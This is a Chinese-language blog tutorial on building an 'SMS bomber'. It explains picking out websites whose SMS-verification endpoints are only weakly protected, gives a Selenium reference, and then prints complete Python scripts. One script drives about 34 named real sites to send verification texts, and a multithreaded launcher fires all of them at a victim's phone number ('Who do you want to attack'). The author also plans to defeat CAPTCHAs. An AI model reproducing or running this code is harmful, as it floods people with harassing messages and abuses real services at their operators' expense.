短信轰炸的前世今生
以前的网站几乎不会对短信验证码接口做太多的安全防护,导致调用短信接口十分容易 - 构造一个post或者get的请求就可以了!恶意调用网站的短信验证码会让平台负担更多的费用!所以各大网站便采用各种方法来防止恶意调用短信接口,诸如:
- 简单图片验证码加上干扰因素
- 图片验证码内包含简单运算
- 点击倒立文字
- 滑块验证码
- 滑块拼图
- 图灵测试
- 后台记录
虽然上述的保护措施都有相应的办法解决,但代价是很大的!对于短信轰炸机来说,避开这些被保护的网站才是最好的办法!我们需要找到是那些只做了后台记录,没有其它措施的网站。当我们找到大量这样的网站,我们就能达到轰炸的效果!但如果网站故意把发包的数据弄得很复杂,没学过web岂不是就凉凉了。先不要慌,我们请出今天的主角- Selenium,这个python库可以模拟执行浏览器操作,这样我们就不用发包,直接模拟填写表单点击发送就可以了!最后,写短信轰炸机就纯属体力活了
Selenium的安装使用
Selenium的库安装很简单,python直接使用pip install即可!使用这个库之前需要下载相应的浏览器驱动,并将下载的驱动放到python的安装目录下。
举个栗子:我用的是最新的火狐浏览器,先进官网下载对应的驱动,我下载的是geckodriver-v0.22,我的python目录在C:\python27-x64\,将刚刚下载的驱动放到这个目录下即可!
Selenium的常见用法
定位元素:
find_element_by_id 通过元素id定位
find_element_by_name 通过元素name定位
find_element_by_xpath 通过xpath表达式定位
find_element_by_link_text 通过完整超链接定位
find_element_by_partial_link_text 通过部分链接定位
find_element_by_tag_name 通过标签定位
find_element_by_class_name 通过类名进行定位
find_element_by_css_selector 通过css选择器进行定位常用函数:
set_window_size() 设置浏览器的大小
back() 控制浏览器后退
forward() 控制浏览器前进
refresh() 刷新当前页面
clear() 清除文本
send_keys(value) 模拟按键输入
click() 单击元素
submit() 用于提交表单
get_attribute(name) 获取元素属性值
is_displayed() 设置该元素是否用户可见
size 返回元素的尺寸
text 获取元素的文本
WebDriverWait() 显示等待,满足条件才执行
driver.implicitly_wait(8) 隐式等待,设置超时时间,无影响鼠标操作:
ActionChains(driver) 构造ActionChains对象
context_click() 执行鼠标悬停操作
move_to_element(above) 右击
double_click() 双击
drag_and_drop() 拖动
move_to_element(above) 执行鼠标悬停操作
context_click() 用于模拟鼠标右键操作, 在调用时需要指定元素定位
perform() 执行所有 ActionChains 中存储的行为,可以理解成是对整个操作的提交动作键盘操作:
send_keys(Keys.BACK_SPACE) 删除键(BackSpace)
send_keys(Keys.SPACE) 空格键(Space)
send_keys(Keys.TAB) 制表键(Tab)
send_keys(Keys.ESCAPE) 回退键(Esc)
send_keys(Keys.ENTER) 回车键(Enter)
send_keys(Keys.CONTROL,‘a’) 全选(Ctrl+A)
send_keys(Keys.CONTROL,‘c’) 复制(Ctrl+C)断言:
title 用于获得当前页面的标题
current_url 用户获得当前页面的URL
text 获取搜索条目的文本信息窗口切换:
current_window_handle 获得当前窗口句柄
window_handles 返回所有窗口的句柄到当前会话
switch_to.window() 用于切换到相应的窗口下拉框:
select_by_value(“选择值”) 相当于我们使用鼠标选择下拉框的值Cookie:
get_cookies() 获得所有cookie信息
get_cookie(name) 返回字典的key为“name”的cookie信息
add_cookie(cookie_dict) 添加cookie。“cookie_dict”指字典对象
delete_cookie(name,optionsString) 删除cookie信息
delete_all_cookies() 删除所有cookie信息调用JS:
js="window.scrollTo(100,450);"
driver.execute_script(js)关闭窗口:
close() 关闭单个窗口
quit() 关闭所有窗口
完整代码
短信验证码接口(smsbomber.py):
# encoding=utf8
import time
from selenium import webdriver
class Bomber(object):
def __init__(self, phone):
self.phone = phone
self.options = webdriver.FirefoxOptions()
self.options.add_argument('--headless') # 后台模式
# 百度
def func0(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://www.baidu.com/')
browser.find_element_by_xpath('//*[@id="u1"]/a[7]').click()
browser.find_element_by_xpath('//*[@id="TANGRAM__PSP_10__footerULoginBtn"]').click()
browser.find_element_by_xpath('//*[@id="TANGRAM__PSP_10__smsSwitchWrapper"]').click()
browser.find_element_by_xpath('//*[@id="TANGRAM__PSP_10__smsPhone"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="TANGRAM__PSP_10__smsTimer"]').click()
browser.quit()
# 1号店
def func1(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://passport.yhd.com/passport/register_input.do')
browser.find_element_by_xpath('//*[@id="userName"]').send_keys('helloworld998')
browser.find_element_by_xpath('//*[@id="phone"]').send_keys(self.phone)
time.sleep(1)
browser.find_element_by_xpath('//*[@id="validPhoneCodeDiv"]/a').click()
browser.find_element_by_xpath('//*[@id="validPhoneCodeDiv"]/a').click()
browser.quit()
# 中国移动
def func2(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://login.10086.cn/login.html')
browser.find_element_by_xpath('//*[@id="sms_login_1"]').click()
browser.find_element_by_xpath('//*[@id="sms_name"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="getSMSPwd1"]').click()
browser.quit()
# 51book
def func3(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('http://caigou.51book.com/caigou/manage/designatedRegistryNewSignon.in')
browser.find_element_by_xpath('//*[@id="cg_06"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="sendMSgBtu"]').click()
browser.quit()
# 世界邦
def func4(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('http://www.shijiebang.com/reg/')
browser.find_element_by_xpath('/html/body/div[1]/div/div[3]/div/ul[1]/li[1]/a').click()
browser.find_element_by_xpath('/html/body/div[8]/div[2]/div/div[2]/div/label[2]/input').click()
browser.find_element_by_xpath('/html/body/div[8]/div[2]/div/div[2]/table[2]/tbody/tr[1]/td/div/input').send_keys(self.phone)
browser.find_element_by_xpath('/html/body/div[8]/div[2]/div/div[2]/table[2]/tbody/tr[2]/td/div/button').click()
browser.quit()
# 优酷
def func5(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://account.youku.com/register.htm')
browser.find_element_by_xpath('//*[@id="passport"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="password"]').send_keys('helloworld998')
browser.find_element_by_xpath('//*[@id="repeatPsd"]').send_keys('helloworld998')
browser.find_element_by_xpath('//*[@id="getMobileCode"]').click()
browser.quit()
# 亚马逊
def func6(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://www.amazon.cn/ap/register?_encoding=UTF8&openid.assoc_handle=cnflex&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.mode=checkid_setup&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.ns.pape=http%3A%2F%2Fspecs.openid.net%2Fextensions%2Fpape%2F1.0&openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.cn%2Fgp%2Fyourstore%2Fhome%3Fie%3DUTF8%26ref_%3Dnav_custrec_newcust')
# browser.find_element_by_xpath('//*[@id="nav-flyout-ya-newCust"]/a').click()
browser.find_element_by_xpath('//*[@id="ap_customer_name"]').send_keys('Mike998')
browser.find_element_by_xpath('//*[@id="ap_phone_number"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="ap_password"]').send_keys('pwd123456')
browser.find_element_by_xpath('//*[@id="ap_register_form"]/div/div/div[5]/div/label/input').click()
browser.find_element_by_xpath('//*[@id="continue"]').click()
browser.quit()
# 私否
def func7(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://segmentfault.com/')
browser.find_element_by_xpath('/html/body/div[2]/nav/div[2]/div[2]/ul/li/a[1]').click()
browser.find_element_by_xpath('/html/body/div[5]/div/div/div[2]/div/div/div/form/div[4]/a').click()
browser.find_element_by_xpath('/html/body/div[5]/div/div/div[2]/div/div/div/form/div[1]/input').send_keys(self.phone)
browser.find_element_by_xpath('/html/body/div[5]/div/div/div[2]/div/div/div/form/div[2]/div[1]/span/button').click()
browser.quit()
# 中瑞财富
def func8(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://www.zrcaifu.com/register')
browser.find_element_by_xpath('//*[@id="register-ul"]/li[1]/input').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="register-ul"]/li[1]/input').click()
browser.find_element_by_xpath('//*[@id="register-ul"]/li[2]/input').send_keys('pwd123456')
browser.find_element_by_xpath('//*[@id="register-ul"]/li[2]/input').click()
browser.find_element_by_xpath('//*[@id="register-ul"]/li[3]/input').send_keys('pwd123456')
time.sleep(1)
browser.find_element_by_xpath('//*[@id="sendsms-for-regiter"]').click()
browser.quit()
# 97格格
def func9(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://www.97gg.net/Account/Register')
browser.find_element_by_xpath('//*[@id="phoneRegistTab"]/tab').click()
browser.find_element_by_xpath('//*[@id="UserName"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="Password"]').send_keys('pwd123456')
browser.find_element_by_xpath('//*[@id="ConfirmPassword"]').send_keys('pwd123456')
browser.find_element_by_xpath('//*[@id="chkCodeSendBtn"]').click()
browser.quit()
# 千米
def func10(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://www.1000.com/reg?us=3W-head')
browser.find_element_by_xpath('//*[@id="react-content"]/div/div/div/div[2]/form/div[2]/div[2]/div/div/input').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="send_code"]').click()
browser.quit()
# 唯品会
def func11(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://passport.vip.com/register')
browser.find_element_by_xpath('//*[@id="J_mobile_name"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="J_mobile_verifycode_btn"]').click()
browser.quit()
# 嗨厨房
def func12(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://m.haichufang.com/reg.html')
browser.find_element_by_xpath('//*[@id="login"]/div[2]/input').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="login"]/div[2]/div[2]/div[1]').click()
browser.quit()
# 好美家
def func13(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('http://www.jaja123.com/web/register')
browser.find_element_by_xpath('/html/body/div/div[4]/form/div/div[1]/div[2]/div[1]/input').send_keys(u'张飞')
browser.find_element_by_xpath('/html/body/div/div[4]/form/div/div[1]/div[3]/div[1]/input').send_keys(self.phone)
browser.find_element_by_xpath('/html/body/div/div[4]/form/div/div[1]/div[4]/div[1]/input').send_keys('pwd123456')
browser.find_element_by_xpath('/html/body/div/div[4]/form/div/div[1]/div[5]/div[1]/input').send_keys('pwd123456')
browser.find_element_by_xpath('/html/body/div/div[4]/form/div/div[1]/div[6]/div[1]/div/span/button').click()
browser.quit()
# 小米
def func14(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://cn.account.xiaomi.com/pass/register?_locale=zh_CN')
browser.find_element_by_xpath('//*[@id="main_container"]/div[3]/div[1]/div/div[3]/div[2]/label/input').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="main_container"]/div[3]/div[1]/div/div[6]/input').click()
browser.quit()
# 巨人网络
def func15(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('http://reg.ztgame.com/')
browser.find_element_by_xpath('//*[@id="reg_form"]/div[1]/input').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="reg_form"]/div[2]/input[2]').click()
browser.quit()
# 微盟
def func16(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://account.weimob.com/register')
browser.find_element_by_xpath('//*[@id="phone"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="signUpForm"]/div[3]/a').click()
browser.quit()
# 商品宅配
def func17(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('http://www.homekoo.com/zhixiao/cuxiao/index.php')
browser.find_element_by_xpath('//*[@id="username5"]').send_keys(u'张飞')
browser.find_element_by_xpath('//*[@id="tel5"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="submit_img5"]').click()
browser.quit()
# 快乐购
def func18(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('http://www.happigo.com/register/')
browser.find_element_by_xpath('//*[@id="mobile"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="send_auth_code"]').click()
browser.quit()
# 手机中国
def func19(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('http://passport.cnmo.com/register/')
browser.find_element_by_xpath('//*[@id="m_mobile"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="m_uname"]').send_keys('helloworld998')
browser.find_element_by_xpath('//*[@id="m_password"]').send_keys('pwd123456')
browser.find_element_by_xpath('//*[@id="m_confirm"]').send_keys('pwd123456')
browser.find_element_by_xpath('//*[@id="m_getcode"]').click()
browser.quit()
# 苏宁
def func20(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://reg.suning.com/person.do')
browser.find_element_by_xpath('//*[@id="mobileAlias"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="sendSmsCode"]').click()
browser.quit()
# 爱奇艺
def func21(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('http://www.iqiyi.com/iframe/loginreg?is_reg=1&')
browser.find_element_by_xpath('/html/body/div[2]/div[2]/div[1]/div[1]/div[1]/div/div[2]/i').click()
browser.find_element_by_xpath('/html/body/div[2]/div[2]/div[1]/div[1]/div[1]/div/div[1]/div[2]/input').send_keys(self.phone)
browser.find_element_by_xpath('/html/body/div[2]/div[2]/div[1]/div[1]/div[1]/div/a[2]').click()
browser.quit()
def func22(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://www.facebank.cn/user.html')
# browser.switch_to.alert()
browser.find_element_by_xpath('//*[@id="mobile"]').send_keys(self.phone)
time.sleep(1)
browser.find_element_by_xpath('//*[@id="getSmsCode"]').click()
time.sleep(1)
browser.quit()
# 支付宝
def func23(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://memberprod.alipay.com/account/reg/index.htm')
# 焦点问题未解决,支付宝接口无效
browser.quit()
# 粉笔网
def func24(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('http://fenbi.com/web/signup')
# 弹窗问题,接口无效
browser.quit()
def func25(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('http://jrh.financeun.com/Login/jrwLogin?web=jrw')
browser.find_element_by_xpath('//*[@id="login-segment-phoneLogin"]').click()
browser.find_element_by_xpath('//*[@id="quickMobile"]').send_keys(self.phone)
time.sleep(1)
browser.find_element_by_xpath('//*[@id="quickSendMsgCode"]').click()
browser.quit()
def func26(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://www.maifupay.com/register')
browser.find_element_by_xpath('/html/body/div[2]/div/div[1]/form/div[1]/input').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="sendVerifySmsButton"]').click()
browser.quit()
def func27(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://passport.ingping.com/reg/index?retUrl=https%3A%2F%2Fwww.ingping.com&fxPid=')
browser.find_element_by_xpath('//*[@id="phoneNum"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="sendRegMsgA"]').click()
browser.quit()
def func28(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://www.decathlon.com.cn/zh/create')
browser.find_element_by_xpath('//*[@id="mobile"]').send_keys(self.phone)
time.sleep(1)
browser.find_element_by_xpath('//*[@id="login-button"]').click()
time.sleep(1)
browser.quit()
# 迅雷
def func29(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://vip.xunlei.com/?referfrom=v_pc_qtcp_ggong_xlhy')
# 类似支付宝页面无法解决焦点问题,猜测用JS解决
browser.quit()
def func30(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://my.ruanmei.com/?page=register')
browser.find_element_by_xpath('//*[@id="phone"]').send_keys(self.phone)
time.sleep(1)
browser.find_element_by_xpath('//*[@id="sendsms"]').click()
browser.quit()
def func31(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://www.juhe.cn/register')
browser.find_element_by_xpath('//*[@id="username"]').send_keys('helloworld998')
browser.find_element_by_xpath('//*[@id="password"]').send_keys('pwd123456')
browser.find_element_by_xpath('//*[@id="mobilephone"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="reg_smsbtn"]').click()
time.sleep(1)
browser.quit()
def func32(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('http://passport.zongheng.com/webreg?location=http%3A%2F%2Fwww.zongheng.com%2F')
browser.find_element_by_xpath('//*[@id="regphone"]').send_keys(self.phone)
time.sleep(1)
browser.find_element_by_xpath('/html/body/div[3]/div[2]/p[3]/span').click()
browser.quit()调用上面的接口实施攻击(attack.py):
# encoding=utf8
# attack.py
from smsbomber import Bomber
import threading
def attack1(phone):
func = ['func%d' %i for i in range(0,15)]
for i in func:
if hasattr(Bomber,i):
try:
getattr(Bomber(phone),i)()
print '%s has excuted!' %i
except:
print '%s meet some problems!' %i
continue
else:
print 'There is not %s' %i
def attack2(phone):
func = ['func%d' %i for i in range(15,30)]
for i in func:
if hasattr(Bomber,i):
try:
getattr(Bomber(phone),i)()
print '%s has excuted!' %i
except:
print '%s meet some problems!' %i
continue
else:
print 'There is not %s' %i
def attack3(phone):
func = ['func%d' %i for i in range(30,45)]
for i in func:
if hasattr(Bomber,i):
try:
getattr(Bomber(phone),i)()
print '%s has excuted!' %i
except:
print '%s meet some problems!' %i
continue
else:
print 'There is not %s' %i
phone = raw_input('Who do you want to attack:').strip()
# phone = '01234567890'
thread1 = threading.Thread(target=attack1,name='thread1',args=(phone,))
thread2 = threading.Thread(target=attack2,name='thread2',args=(phone,))
thread3 = threading.Thread(target=attack3,name='thread3',args=(phone,))
# threading.current_thread().name
thread1.start()
thread2.start()
thread3.start()
thread1.join()
thread2.join()
thread3.join()
print 'Good Bye!'
已经实现:
- 多线程
- 异常处理
- 减少浏览器驱动的资源占用
暂未实现并且有可能实现:
- 多进程
- 机器学习识别简单的图片验证码
- JS模拟拖动滑块
- ActionChains实现拼图
运行结果
python
**粗体** _斜体_ [链接](http://example.com) `代码` - 列表 > 引用。你还可以使用@来通知其他用户。